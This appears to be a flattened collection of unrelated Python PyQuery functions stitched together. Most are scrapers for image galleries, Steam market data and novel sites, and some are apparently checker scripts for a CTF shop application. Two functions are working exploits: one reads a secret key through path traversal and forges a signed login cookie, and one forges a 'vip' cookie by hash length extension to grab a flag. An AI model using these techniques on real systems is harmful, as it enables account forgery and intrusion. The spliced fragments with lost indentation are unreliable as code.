def write_bio_test(self): s = req.session() rs = s.get(self.url + 'login') html = rs.text token = self._get_token(html) x, y = self._get_answer(html) rs = s.post(url=self.url + 'login', data={ self.csrfname: token, "username": "******", "password": "******", "captcha_x": x, "captcha_y": y }) rs = s.get(self.url + 'user') html = rs.text token = self._get_token(html) rs = s.post(self.url + "user", data={ csrfname: token, "bio": "Too Young Too Simple" }) dom = PQ(rs.text) success = dom("div.alert.alert-success") success = PQ(success).text().strip() if len(success): print "[+] Write Bio Success" return True print "[-] Write Bio Failed" return False
def analyse_detail_page(self, html): pq = PQ(html) div = pq('.main') title = div('.QTitle a').text() question = div('.Content>.detail').text() tags = list(PQ(a).text() for a in div('#tags_nav a')) answers = list() for li in pq('.QuestionReplies li'): li = PQ(li) answer_content = li('.body .detail').text() vote_div = PQ(li.prev('div')) answer_accepted = True if vote_div('.accept-on') else False answers.append((answer_content, answer_accepted)) try: text = pq('div[class="Asker special"] .pinfo>span:eq(1)').text() count_answer, count_view = re.search(u'(\d+) \u56de/(\d+)\u9605', text).groups() except: count_answer = 0 count_view = 1 return dict(title=title, content=question, tags=tags, answers=answers, count_answer=count_answer, count_view=count_view)
def _process(self, page): pq = PQ(page) data = [] products = pq('li.grid-tile') for product in products: foo = PQ(product) #origin_price = foo('.product-standard-price').text().replace('MSRP:', '').replace('$', '').strip() origin_price = re.findall('[\d\.]+', foo('.product-standard-price').text()) sales_price = re.findall('[\d\.]+', foo('.product-sales-price').text()) if not origin_price or not sales_price: continue data.append({ 'image': foo('img').attr('src'), 'link': parse_url(foo('.name-link').attr('href')), 'title': foo('.name-link').text(), 'original_price': origin_price[0], 'sales_price': sales_price[0] }) data = { 'website': 'carters', 'currency': 'USD', 'country': 'USA', 'store_id': self.store_id, 'data': json.dumps(data) } data.update(self._extra_kwargs) self._save(data)
def exp_make_cookie(self): url = "http://localhost:8233/static/../assets.key" req = urllib2.Request(url) res_data = urllib2.urlopen(req) key = res_data.read() tt = escape.native_str( create_signed_value(key, 'username', 'Jack_Ma', version=None, key_version=None)) rs = self.session.get(self.url + 'login') html = rs.text token = self._get_token(html) x, y = self._get_answer(html) # rs = self.session.post(url=self.url + 'login', data={ # self.csrfname: token, # "username": "******", # }) cookie = {self.csrfname: token, "username": tt} rs = self.session.get(url=self.url + 'user', cookies=cookie) dom = PQ(rs.text) failed = dom('div') failed = PQ(failed).text().strip() flag = re.findall(r"flag=(.+?) if", failed) print flag
def gettoken(html): token_name = "token" dom = PQ(html) form = dom("form") token = str(PQ(form)("input[name=\"%s\"]" % token_name).attr("value")).strip() return token
def shopcar_add_test(self): rs = self.session.get(self.url + 'shop') dom = PQ(rs.text) form = dom("form") token = str( PQ(form[0])("input[name=\"%s\"]" % self.csrfname).attr("value")).strip() rs = self.session.post(self.url + 'shopcar/add', data={ self.csrfname: token, 'id': 1 }) dom = PQ(rs.text) commodity = dom('div.shopcar_list') commodity = PQ(commodity).text().strip() if len(commodity): print '[+] Shopcar Add Success' return True print '[-] Shopcar Add Failed' return False
def login(s, username, password, mail, csrfname, url): rs = s.get(url + 'login') html = rs.text token = get_token(html, csrfname) x, y = get_answer(html) rs = s.post(url=url + 'login', data={ csrfname: token, "username": username, "password": password, "captcha_x": x, "captcha_y": y }) try: dom = PQ(rs.text) error = dom("div.alert.alert-danger") error = PQ(error).text().strip() if len(error): print "[-] Login failed." return False except: pass print "[+] Login Success." return True
def register_test(self, invite=''): rs = self.session.get(self.url + 'register') html = rs.text token = self._get_token(html) x, y = self._get_answer(html) rs = self.session.post(url=self.url + 'register', data={ self.csrfname: token, "username": self.username, "password": self.password, "password_confirm": self.password, "mail": self.mail, "invite_user": invite, "captcha_x": x, "captcha_y": y, }) try: dom = PQ(rs.text) error = dom("div.alert.alert-danger") error = PQ(error).text().strip() if len(error): print "[-] Register failed." return False except: pass print "[+] Register Success." return True
def register(s, username, password, mail, csrfname, url, invite=''): rs = s.get(url + 'register') html = rs.text token = get_token(html, csrfname) x, y = get_answer(html) rs = s.post(url=url + 'register', data={ csrfname: token, "username": username, "password": password, "password_confirm": password, "mail": mail, "invite_user": invite, "captcha_x": x, "captcha_y": y, }) try: dom = PQ(rs.text) error = dom("div.alert.alert-danger") error = PQ(error).text().strip() if len(error): print "[-] Register failed." return False except: pass print "[+] Register Success." return True
def _get_token(self, html): dom = PQ(html) form = dom("form") token = str( PQ(form)("input[name=\"%s\"]" % self.csrfname).attr("value")).strip() return token
def proc_item_list(q): keys = ['ruten', 'pchome'] for k in keys: items = q('a[%s]' % k).filter(lambda i: len(PQ(this).children('img')) == 0) if len(items) > 0: print 'found via key "%s"' % k break print 'total links found: %d' % len(items) if len(items) == 0: return -1 c = 0 for i in items: m = re.search(DISEL_TITLE, PQ(i).text()) if not m: continue c += 1 dt = { 'style': m.group('STYLE'), 'wash': m.group('WASH'), 'url': PQ(i).attr('href') } # QUEUE.put(dt) proc_item(dt) # print dt return c
def login(self): rs = self.session.get(self.url + 'login') html = rs.text token = self._get_token(html) x, y = self._get_answer(html) rs = self.session.post(url=self.url + 'login', data={ self.csrfname: token, "username": self.username, "password": self.password, "captcha_x": x, "captcha_y": y }) try: dom = PQ(rs.text) error = dom("div.alert.alert-danger") error = PQ(error).text().strip() if len(error): print "[-] Login failed." return False except: pass print "[+] Login Success." self.wallet = self._get_user_wallet() return True
def get_album_page(album_id): album_url = "http://www.ugirls.com/Content/List/Magazine-%s.html" % album_id album_response = net.http_request(album_url, method="GET") result = { "image_url_list": [], # 全部图片地址 "is_delete": False, # 是不是已经被删除 "model_name": "", # 模特名字 } if album_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( crawler.request_failre(album_response.status)) if album_response.data.find("该页面不存在,或者已经被删除!") >= 0: result["is_delete"] = True return result # 获取模特名字 model_name = PQ(album_response.data).find( "div.ren_head div.ren_head_c a").attr("title") if not model_name: raise crawler.CrawlerException("模特信息截取模特名字失败\n%s" % album_response.data) result["model_name"] = model_name.encode("UTF-8").strip() # 获取所有图片地址 image_list_selector = PQ(album_response.data).find("ul#myGallery li img") if image_list_selector.length == 0: raise crawler.CrawlerException("页面匹配图片地址失败\n%s" % album_response.data) for image_index in range(0, image_list_selector.length): image_url = image_list_selector.eq(image_index).attr("src") if image_url.find("_magazine_web_m.") == -1: raise crawler.CrawlerException("图片地址不符合规则\n%s" % image_url) result["image_url_list"].append( image_url.replace("_magazine_web_m.", "_magazine_web_l.")) return result
def reset_password_test(self): res = self.session.get(self.url + 'pass/reset') html = res.text token = self._get_token(html) x, y = self._get_answer(html) rs = self.session.post(self.url + 'pass/reset', data={ self.csrfname: token, 'mail': self.mail, "captcha_x": x, "captcha_y": y }) dom = PQ(rs.text) failed = dom('div.alert.alert-danger') failed = PQ(failed).text().strip() if len(failed): print '[-] Reset Password Failed' return True print '[+] Reset Password Success' return False
def parse_html(filename, download='磁力'): with open(filename, encoding='utf-8') as f: html_raw = f.read() html = PQ(html_raw) alist = html.find('a') for a in alist: if download in PQ(a).text(): print(a.attrib['href'])
def extract_detail_url(self, html): pq = PQ(html) div = pq("div[class='question-detail']") hrefs = list() for a in div('a:eq(0)'): href = PQ(a).attr('href') hrefs.append(href) return hrefs
def get_album_page(sub_path, page_count): album_pagination_url = "http://www.88mmw.com/%s/list_%s_%s.html" % ( sub_path, SUB_PATH_LIST[sub_path], page_count) album_pagination_response = net.http_request(album_pagination_url, method="GET") result = { "album_info_list": [], # 全部图集信息 "is_over": False, # 是不是最后一页图集 } if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( crawler.request_failre(album_pagination_response.status)) # 页面编码 album_pagination_html = album_pagination_response.data.decode("GBK") # 获取图集信息,存在两种页面样式 album_list_selector = PQ(album_pagination_html).find("div.xxx li a") if album_list_selector.length == 0: album_list_selector = PQ(album_pagination_html).find("div.yyy li a") if album_list_selector.length == 0: raise crawler.CrawlerException("页面截取图集列表失败\n%s" % album_pagination_html.encode("UTF-8")) for album_index in range(0, album_list_selector.length): result_album_info = { "album_title": "", # 图集id "page_id": None, # 图集页面id } album_selector = album_list_selector.eq(album_index) # 获取图集id album_url = album_selector.attr("href") if not album_url: raise crawler.CrawlerException( "图集列表截取图集地址失败\n%s" % album_selector.html().encode("UTF-8")) album_id = album_url.split("/")[-2] if not crawler.is_integer(album_id): raise crawler.CrawlerException("图集地址截取图集id失败\n%s" % str(album_url)) result_album_info["page_id"] = album_id # 获取图集标题 album_title = album_selector.attr("title").encode("UTF-8") if len(re.findall("_共\d*张", album_title)) == 1: result_album_info["album_title"] = album_title[:album_title. rfind("_共")] else: result_album_info["album_title"] = album_title result["album_info_list"].append(result_album_info) # 判断是不是最后一页 max_page_info = PQ(album_pagination_html).find("div.page a").eq(-1).text() if not max_page_info: raise crawler.CrawlerException("总页数信息截取失败\n%s" % album_pagination_html.encode("UTF-8")) max_page_count = tool.find_sub_string(max_page_info.encode("UTF-8"), "共", "页") if not crawler.is_integer(max_page_count): raise crawler.CrawlerException("总页数截取失败\n%s" % max_page_info.encode("UTF-8")) result["is_over"] = page_count >= int(max_page_count) return result
def extract_detail_url(self, html): pq = PQ(html) div = pq("div[class='question-summary']") hrefs = list() for a in div('h3 a'): href = PQ(a).attr('href') if href.startswith('/'): href = self.BASE_URL + href hrefs.append(href) return hrefs
def getBusArray(self): page = PQ(self.URL_DATA) array_buttons = [] selectList = PQ('#linea', page)('option') for option in selectList: bus = PQ(option).attr('idlinea') if bus: array_buttons.append([PQ(option).text()]) return array_buttons
def get_album_page(album_id): page_count = max_page_count = 1 result = { "album_title": "", # 图集标题 "image_url_list": [], # 全部图片地址 "is_delete": False, # 是不是已经被删除 } while page_count <= max_page_count: album_pagination_url = "http://www.youzi4.cc/mm/%s/%s_%s.html" % ( album_id, album_id, page_count) album_pagination_response = net.http_request(album_pagination_url, method="GET") if album_pagination_response.status == 404 and page_count == 1: result["is_delete"] = True return result if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( "第%s页 " % page_count + crawler.request_failre(album_pagination_response.status)) # 判断图集是否已经被删除 if page_count == 1: # 获取图集标题 album_title = PQ(album_pagination_response.data.decode( "UTF-8")).find("meta[name='description']").attr("content") if not album_title: raise crawler.CrawlerException("页面截取标题失败\n%s" % album_pagination_response.data) result["album_title"] = album_title.encode("UTF-8") # 获取图集图片地址 image_list_selector = PQ( album_pagination_response.data).find("div.articleV4Body a img") if image_list_selector.length == 0: raise crawler.CrawlerException( "第%s页 页面匹配图片地址失败\n%s" % (page_count, album_pagination_response.data)) for image_index in range(0, image_list_selector.length): result["image_url_list"].append( str(image_list_selector.eq(image_index).attr("src"))) # 获取总页数 pagination_list_selector = PQ( album_pagination_response.data).find("ul.articleV4Page a.page-a") if pagination_list_selector.length > 0: for pagination_index in range(0, pagination_list_selector.length): temp_page_count = pagination_list_selector.eq( pagination_index).html() if crawler.is_integer(temp_page_count): max_page_count = max(int(temp_page_count), max_page_count) else: if page_count > 1: raise crawler.CrawlerException( "第%s页 页面匹配分页信息失败\n%s" % (page_count, album_pagination_response.data)) page_count += 1 return result
def write_bio(s, payload, csrfname, url): rs = s.get(url + 'user') html = rs.text token = get_token(html, csrfname) rs = s.post(url + "user", data={csrfname: token, "bio": payload}) dom = PQ(rs.text) success = dom("div.alert.alert-success") success = PQ(success).text().strip() if len(success): print "[+] Write Bio Success" return True return False
def getBusFirstStreet(self, bus): page = PQ(self.URL_DATA) array_buttons = [] selectList = PQ('#linea', page)('option') for option in selectList: bus_number = PQ(option).text() if bus_number == str(bus): idLinea = PQ(option).attr('idlinea') print(idLinea) data = {"accion": self.ACTION_FIRST_STREET, "idLinea": idLinea} r = requests.post(self.URL_ACTION, data=data) for street in loads(r._content.decode("utf-8-sig").encode("utf-8")): array_buttons.append([street["desc"]]) return array_buttons
def get_one_page_album(account_id, page_count): # http://bcy.net/u/50220/post/cos?&p=1 album_pagination_url = "http://bcy.net/u/%s/post/cos" % account_id query_data = {"p": page_count} album_pagination_response = net.http_request(album_pagination_url, method="GET", fields=query_data) result = { "album_info_list": [], # 全部作品信息 "coser_id": None, # coser id "is_over": False, # 是不是最后一页作品 } if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException(crawler.request_failre(album_pagination_response.status)) if page_count == 1 and album_pagination_response.data.find("<h2>用户不存在</h2>") >= 0: raise crawler.CrawlerException("账号不存在") # 获取coser id coser_id_find = re.findall('<a href="/coser/detail/([\d]+)/\$\{post.rp_id\}', album_pagination_response.data) if len(coser_id_find) != 1: raise crawler.CrawlerException("页面截取coser id失败\n%s" % album_pagination_response.data) if not crawler.is_integer(coser_id_find[0]): raise crawler.CrawlerException("页面截取coser id类型不正确\n%s" % album_pagination_response.data) result["coser_id"] = coser_id_find[0] # 获取作品信息 album_list_selector = PQ(album_pagination_response.data.decode("UTF-8")).find("ul.l-grid__inner li.l-grid__item") for album_index in range(0, album_list_selector.size()): album_selector = album_list_selector.eq(album_index) result_album_info = { "album_id": None, # 作品id "album_title": None, # 作品标题 } # 获取作品id album_url = album_selector.find(".postWorkCard__img a.postWorkCard__link").attr("href") if not album_url: raise crawler.CrawlerException("作品信息截取作品地址失败\n%s" % album_selector.html().encode("UTF-8")) album_id = str(album_url).split("/")[-1] if not crawler.is_integer(album_id): raise crawler.CrawlerException("作品地址 %s 截取作品id失败\n%s" % (album_url, album_selector.html().encode("UTF-8"))) result_album_info['album_id'] = album_id # 获取作品标题 album_title = album_selector.find(".postWorkCard__img img").attr("alt") result_album_info["album_title"] = str(album_title.encode("UTF-8")) result["album_info_list"].append(result_album_info) # 判断是不是最后一页 last_pagination_selector = PQ(album_pagination_response.data).find("#js-showPagination ul.pager li:last a") if last_pagination_selector.size() == 1: max_page_count = int(last_pagination_selector.attr("href").strip().split("&p=")[-1]) result["is_over"] = page_count >= max_page_count else: result["is_over"] = True return result
def shopcar_add_test(self): rs = self.session.get(self.url + 'shop/') token = self._get_token(rs.text) rs = self.session.post(self.url + 'shopcar/add/', data={ self.csrfname: token, 'id': random.randint(1, 100) }) dom = PQ(rs.text) commodity = dom('div.shopcar_list') commodity = PQ(commodity).text().strip() if len(commodity): print '[+] Shopcar Add Success' return True print '[-] Shopcar Add Failed' return False
def getflag(host, port): wc = WebChecker(str(host), str(port)) wc.register() cookies = wc.login() gg = hashpump(cookies['user_cookie'], wc.username, 'vip', int(cookies['secretkey_length'])) cookies['user_cookie'] = gg[0] cookies['username'] = gg[1].encode('hex') se = req.session() url = 'http://%s:%s/' % (host, port) rs = se.get(url + 'user', cookies=cookies) dom = PQ(rs.text) flag = dom("div.alert.alert-success") flag = PQ(flag).text().strip() print flag
def op_all_text(text): text = PQ(text) try: for item in text('div.index_toplist').items(): t = item('.toptab span').text().split()[0] format1 = '{}的{}' p = list( zip([i for i in item('.tabRight').text() if i != ' '], [i.attr('id')[-1] for i in item('.tabRight span').items()])) for ul in item('.topbooks ul').items(): for name, num in p: a = {'排行榜': t} if num == ul.parent().attr('id')[-1]: a['排行榜'] = format1.format(name, t) p1 = 1 for li in ul('li').items(): a['更新日期'] = li('.hits').text() a['排名'] = li('.num').text() a['作品'] = li('a').text() a['作品链接'] = 'https://www.qu.la' + li('a').attr( 'href') yield a, p1 a = {} p1 = 0 else: continue except: print('op_all_text has an error!')
def get_book(list1): """ list1:由书名,书链接,所在排行榜组成的字典 目的是得到每一本书的所有章节并写入相关文件中 """ text = get_url(list1['href']) text = PQ(text) text = text('div#list') t = 0 #只是为了测试 for dd in text('dd').items(): try: #只是为了测试 if 'book' in dd('a').attr('href'): t += 1 print(list1) if t == 8: break write_one_chapter('https://www.qu.la' + dd('a').attr('href'), list1) if t == 4: #只是为了测试 return #只是为了测试 except: print('get_book has a problem!') continue
def get_market_game_trade_card_price(game_id, login_cookie): cookies_list = {"steamLogin": login_cookie} market_search_url = "http://steamcommunity.com/market/search/render/" market_search_url += "?query=&count=20&appid=753&category_753_Game[0]=tag_app_%s&category_753_cardborder[0]=tag_cardborder_0" % game_id market_search_response = net.http_request(market_search_url, method="GET", cookies_list=cookies_list, json_decode=True) if market_search_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( crawler.request_failre(market_search_response.status)) market_item_list = {} if not crawler.check_sub_key( ("success", "results_html"), market_search_response.json_data): raise crawler.CrawlerException( "返回信息'success'或'results_html'字段不存在\n%s" % market_search_response.json_data) if market_search_response.json_data["success"] is not True: raise crawler.CrawlerException("返回信息'success'字段取值不正确\n%s" % market_search_response.json_data) card_selector = PQ(market_search_response.json_data["results_html"]).find( ".market_listing_row_link") for index in range(0, card_selector.length): card_name = card_selector.eq(index).find( ".market_listing_item_name").text() card_min_price = card_selector.eq(index).find( "span.normal_price span.normal_price").text().encode( "UTF-8").replace("¥ ", "") market_item_list[card_name] = card_min_price # {'Pamu': '1.77', 'Fumi (Trading Card)': '2.14', 'Mio (Trading Card)': '1.33', 'Bonnibel (Trading Card)': '1.49', 'Groupshot': '1.87', 'Q-Piddy': '1.35', 'Elle (Trading Card)': '1.19', 'Quill': '1.50', 'Iro (Trading Card)': '1.42', 'Bearverly (Trading Card)': '1.27', 'Cassie (Trading Card)': '1.35'} return market_item_list
def get_self_account_badges(account_id, login_cookie): # 徽章第一页 badges_index_url = "http://steamcommunity.com/profiles/%s/badges/" % account_id cookies_list = {"steamLogin": login_cookie} badges_index_response = net.http_request(badges_index_url, method="GET", cookies_list=cookies_list) if badges_index_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( crawler.request_failre(badges_index_response.status)) badges_detail_url_list = [] # 徽章div badges_selector = PQ(badges_index_response.data).find( ".maincontent .badges_sheet .badge_row") for index in range(0, badges_selector.length): badge_html = badges_selector.eq(index).html().encode("UTF-8") # 已经掉落全部卡牌的徽章 if badge_html.find("无剩余卡牌掉落") >= 0: # 徽章详细信息页面地址 badge_detail_url = tool.find_sub_string( badge_html, '<a class="badge_row_overlay" href="', '"/>') if not badge_detail_url: raise crawler.CrawlerException("徽章信息截取徽章详细界面地址失败\n%s" % badge_html) badges_detail_url_list.append(badge_detail_url) # ['http://steamcommunity.com/profiles/76561198172925593/gamecards/459820/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/357200/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/502740/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359600/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/354380/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359670/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/525300/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/337980/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/591420/'] return badges_detail_url_list
def get_one_page_account(page_count): account_pagination_url = "http://jigadori.fkoji.com/users" query_data = {"p": page_count} account_pagination_response = net.http_request(account_pagination_url, method="GET", fields=query_data) pagination_account_list = {} if account_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED: crawler.CrawlerException( crawler.request_failre(account_pagination_response.status)) account_list_selector = PQ(account_pagination_response.data.decode( "UTF-8")).find(".users-list li") for account_index in range(0, account_list_selector.length): account_selector = account_list_selector.eq(account_index) # 获取成员名字 account_name = account_selector.find(".profile-name").eq(0).text() if not account_name: account_name = "" # raise robot.CrawlerException("成员信息截取成员名字失败\n\%s" % account_selector.html().encode("UTF-8")) else: account_name = account_name.strip().encode("UTF-8") # 获取twitter账号 account_id = account_selector.find(".screen-name a").text() if not account_id: raise crawler.CrawlerException( "成员信息截取twitter账号失败\n\%s" % account_selector.html().encode("UTF-8")) account_id = account_id.strip().replace("@", "") pagination_account_list[account_id] = account_name return pagination_account_list